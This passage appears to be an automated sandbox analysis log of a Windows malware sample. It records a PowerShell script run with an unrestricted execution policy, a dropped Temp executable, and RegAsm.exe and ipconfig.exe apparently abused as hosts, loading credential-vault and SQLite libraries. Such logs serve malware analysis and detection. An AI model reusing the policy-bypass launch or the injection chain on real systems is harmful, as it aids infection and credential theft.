Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_02F82CA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_02F82C70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82C60 NtCreateKey,LdrInitializeThunk,	7_2_02F82C60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_02F82DF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82DD0 NtDelayExecution,LdrInitializeThunk,	7_2_02F82DD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_02F82D30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_02F82D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F835C0 NtCreateMutant,LdrInitializeThunk,	7_2_02F835C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F839B0 NtGetContextThread,LdrInitializeThunk,	7_2_02F839B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82AB0 NtWaitForSingleObject,	7_2_02F82AB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82BF0 NtAllocateVirtualMemory,	7_2_02F82BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82BE0 NtQueryValueKey,	7_2_02F82BE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82BA0 NtEnumerateValueKey,	7_2_02F82BA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82B80 NtQueryInformationFile,	7_2_02F82B80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82EA0 NtAdjustPrivilegesToken,	7_2_02F82EA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82E80 NtReadVirtualMemory,	7_2_02F82E80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82E30 NtWriteVirtualMemory,	7_2_02F82E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82FA0 NtQuerySection,	7_2_02F82FA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82F90 NtProtectVirtualMemory,	7_2_02F82F90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82F60 NtCreateProcessEx,	7_2_02F82F60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82CF0 NtOpenProcess,	7_2_02F82CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82CC0 NtQueryVirtualMemory,	7_2_02F82CC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82C00 NtQueryInformationProcess,	7_2_02F82C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82DB0 NtEnumerateKey,	7_2_02F82DB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F82D00 NtSetInformationFile,	7_2_02F82D00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F83090 NtSetValueKey,	7_2_02F83090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F83010 NtOpenDirectoryObject,	7_2_02F83010
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F83D70 NtOpenThread,	7_2_02F83D70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F83D10 NtOpenProcessToken,	7_2_02F83D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_026A92B0 NtCreateFile,	7_2_026A92B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_026A9420 NtReadFile,	7_2_026A9420
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_026A9510 NtDeleteFile,	7_2_026A9510
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_026A95B0 NtClose,	7_2_026A95B0

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02F97E54 appears 100 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02F3B970 appears 275 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02FBEA12 appears 86 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02FCF290 appears 105 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02F85130 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0306B970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 030FF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 030B5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 030C7E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 030EEA12 appears 86 times

Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\done1.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe "C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe"
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe "C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\z3FgtAArgRVFoLlwLoetbjM.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe	Code function: 2_2_024E1B1D push 633534B7h; retf	2_2_024E1B37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041817E push esp; retf	3_2_0041817F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040ABC1 push 6F9632E0h; ret	3_2_0040ABC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403470 push eax; ret	3_2_00403472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040AC08 push esp; iretd	3_2_0040AC09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004184C2 push ebx; iretd	3_2_004184C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004186BF push ebp; ret	3_2_004186C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418795 push edx; iretd	3_2_00418796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0304225F pushad ; ret	3_2_030427F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030427FA pushad ; ret	3_2_030427F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_030709AD push ecx; mov dword ptr [esp], ecx	3_2_030709B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0304283D push eax; iretd	3_2_03042858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0304134E push eax; iretd	3_2_03041369
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02F409AD push ecx; mov dword ptr [esp], ecx	7_2_02F409B6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0269524C push ebp; ret	7_2_0269524D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0268E222 push ebp; iretd	7_2_0268E228
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02695322 push edx; iretd	7_2_02695323
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0269504F push ebx; iretd	7_2_02695051
